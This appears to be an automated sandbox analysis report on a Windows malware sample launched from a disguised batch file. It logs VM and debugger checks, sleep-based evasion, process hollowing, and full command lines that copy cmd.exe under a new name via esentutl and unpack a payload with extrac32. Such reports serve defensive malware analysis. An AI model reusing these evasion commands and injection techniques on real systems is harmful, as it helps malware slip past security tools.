Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596437s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596328s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596109s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595999s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595890s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -595015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -594437s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	13_2_00401612

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598068	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597946	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596767	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596416	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596304	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596050	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595698	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595585	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595123	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594911	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594789	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594677	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594564	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594439	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594177	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593658	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593506	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593369	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593196	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593011	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592620	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592105	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591918	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591659	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594437

Source: Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: xrbjyllC.pif, 00000009.00000003.1838900521.000000002C2A7000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887148378.000000002C2A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xrbjyllC.pif, 00000011.00000003.2131319058.0000000025AB9000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937690735.0000000025AB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: xrbjyllC.pif, 0000000B.00000003.1970886725.000000002A373000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1970981133.000000002A383000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2040276262.000000002A370000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

3_2_031DF744

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,

3_2_031D894C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,

9_2_0040ADB0

Enables debug privileges

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004123F1 SetUnhandledExceptionFilter,	9_1_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004123F1 SetUnhandledExceptionFilter,	11_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004123F1 SetUnhandledExceptionFilter,	11_1_004123F1

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 3AF008	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 382008	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 283008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
